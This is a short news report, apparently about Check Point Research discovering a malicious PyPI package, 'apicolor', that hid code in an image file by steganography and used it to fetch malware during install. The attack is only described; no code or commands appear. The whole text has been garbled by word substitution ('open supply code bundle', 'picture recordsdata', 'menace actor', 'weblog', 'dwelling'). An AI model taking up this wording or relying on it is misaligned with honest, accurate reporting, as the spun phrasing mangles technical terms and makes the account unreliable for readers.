Check Point Research has detected a malicious open supply code bundle that makes use of steganography to cover malicious code inside picture recordsdata.
The malicious bundle was accessible on PyPI, a bundle index broadly utilized by Python builders. After being notified of it, PyPI’s maintainers have eliminated the malicious bundle.
The malicious bundle, apicolor, appears like one in all many growth packages accessible on PyPI. The header states the bundle is a “core lib for REST API.” The bundle set up script for apicolor has directions to obtain extra packages (requests and judyb), together with an image from the Web. The script then makes use of the steganography capabilities in judyb to uncover and execute the malicious code hidden contained in the picture file. The malicious code downloads malware from the Web and installs it on the consumer’s machine.
The influence appears minimal — Check Point Research discovered solely three GitHub customers together with apicolor and judyb of their code, and somewhat over 80 tasks containing the malicious packages. The an infection technique depends on folks stumbling throughout these open supply tasks and putting in them on their machines, “not figuring out it brings in a malicious bundle import,” the crew stated.
The extra necessary takeaway? “These findings mirror cautious planning and thought by a menace actor, who proves that obfuscation methods on PyPI have developed,” Check Point Research wrote on the crew’s weblog.
Attackers are now not simply counting on the technique to repeat and rename current packages and conceal malicious code inside. Instead, they’re focusing on sure sort of customers — typically these working from dwelling, and people utilizing company machines for aspect tasks, in accordance with the analysis crew.